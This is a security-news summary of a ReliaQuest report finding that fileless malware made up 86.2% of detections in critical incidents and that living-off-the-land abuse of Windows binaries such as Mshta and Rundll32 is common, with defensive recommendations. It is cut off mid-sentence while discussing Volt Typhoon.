Fileless malware accounts for 86.2% of all detections - ReliaQuest
May 2024 by ReliaQuest
ReliaQuest has published a new report looking at Living off the Land and Fileless malware attacks.
They key details are below including that files malware accounts for 86.2% of all detections and that roughly a quarter of all critical incidents ReliaQuest observed in customer environments involved the use of LotL techniques.
• Most of the critical customer incidents we responded to in 2023 involved fileless malware, accounting for 86.2% of all detections. Many of these intrusions also utilized Living Off the Land (LotL) techniques, abusing legitimate Windows binaries such as Rundll32, Msiexec, and Mshta.
• Fileless malware and LotL techniques help attackers blend in with legitimate activity, making detection difficult. Fileless malware executes in-memory, leaving fewer indicators of suspicious activity. LotL activity leverages legitimate operating-system binaries, which are needed for regular system functions.
• We expect the abuse of fileless malware and LotL activity to continue in 2024 for conducting stealthy cyber operations. ReliaQuest offers detection rules to identify this activity.
• For the interest of security decision-makers and defenders alike, this report contains mitigation recommendations focusing on monitoring LOLBins, registry changes, application control, and the abuse of legitimate Windows tools
Fileless malware presents many problems for security teams, making it an attractive choice for threat actors:
• Fileless malware, like SocGholish, is harder to detect than traditional malware because it resides solely in memory and exhibits low-observable characteristics (LOCs)effectively evading many standard security measures.
• It manipulates command lines of trusted applications, such as PowerShell, allowing malicious activities to blend in with normal, authorized operations and bypass security measures that typically allowlist these applications.
• Since it leaves no malicious files on the hard drive, fileless malware makes post-incident analysis and attribution more challenging for security teams.
• Remediation and detection are more complex as there are no specific files or traditional malware signatures to target, requiring more sophisticated and resource-intensive methods, like behavioral analysis.
Similarly, many sophisticated threat actors prefer to “live off the land” to reduce the risk of detection. In 2023, roughly a quarter of all critical incidents we observed in customer environments involved the use of LotL techniques. LotL is a popular attack vector for multiple reasons:
• The lack of indicators of compromise (IoCs) associated with LotL activities makes it challenging for defenders to track and categorize malicious behaviors.
• LotL saves resources by not having to invest in the development and deployment of custom tools.
• Many organizations do not have established baselines, making it difficult to detect malicious LotL activity. This means attackers can blend in more easily with normal activities.
• Defenders often face operational challenges such as working in organizational silos and sifting through large volumes of log data to identify malicious activity, making LotL tactics harder to detect.
The growing prevalence of these attacks presents a significant challenge to organizations. These threats are stealthy and can remain undetected for long periods. Therefore, these techniques have been popular with sophisticated adversaries, such as nation-state–linked threat actors and advanced persistent threat (APT) groups. Typically, the more sophisticated a threat actor is, the more likely they are to attempt to live off the land and use fileless malware. For example, the China-based threat group “Volt Typhoon”